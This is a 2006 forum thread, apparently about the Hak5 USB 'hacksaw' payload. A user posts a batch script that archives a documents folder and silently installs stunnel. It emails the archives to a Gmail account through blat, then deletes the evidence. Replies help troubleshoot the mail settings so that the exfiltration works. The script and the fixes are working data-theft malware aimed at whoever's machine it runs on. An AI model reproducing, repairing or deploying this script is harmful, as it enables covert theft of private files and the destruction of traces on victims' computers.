xFilthyxJesusx Posted October 16, 2006 Share Posted October 16, 2006 I for some reason cannt get the files to send to me. It will rar them but it will not send to my email or will not send from the email. IE: I check the senders sent box nothing. I check the recipents box, nothing. :: Configure Email Options SET emailfrom= SET emailto= SET password= SET subject= %computername%_ip :: Archive documents in 8MB chunks rar a goodies.rar .docs -v8192k -vn stunnel-4.11.exe -install -quiet net start stunnel GOTO sendfiles :cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents rmdir /s /q docs :: Delete archive del /q /f goodies*.* GOTO end :sendfiles for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -s %subject% -server 127.0.0.1:1099 GOTO cleanup :end exit Well thats the send.bat file I'm using. In the email from I have a 20 character address. and the email to is 22 characters long. Is there maybe a size limitation. I also added @gmail.com to the entries. are you not supposed to do that either? Quote Link to comment Share on other sites More sharing options...
spektormax Posted October 16, 2006 Share Posted October 16, 2006 it would be email_from=hak5hacksaw@gmial.com email_to=hak5hacksaw@gmial.com password=lamepassword Quote Link to comment Share on other sites More sharing options...
xFilthyxJesusx Posted October 16, 2006 Author Share Posted October 16, 2006 so gmail is spelt wrong for one. And there is supposed to be a space in between email to and email from/ Quote Link to comment Share on other sites More sharing options...
dennis Posted October 16, 2006 Share Posted October 16, 2006 It sends fine for me. Just give it time. Check your task manager and see if blat.exe is still running. It might be sending the file still. Quote Link to comment Share on other sites More sharing options...
vector Posted November 4, 2006 Share Posted November 4, 2006 i think you need to set the emailfrom and emailto address as the same. thats how i do it and when i recieve the emails its says from "me" that might be the problem. Quote Link to comment Share on other sites More sharing options...
pseudobreed Posted November 4, 2006 Share Posted November 4, 2006 Gmail auths the user only if the From address and the User address are the same. Actually most mail servers do it this way unless they do not require auth before sending mail. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.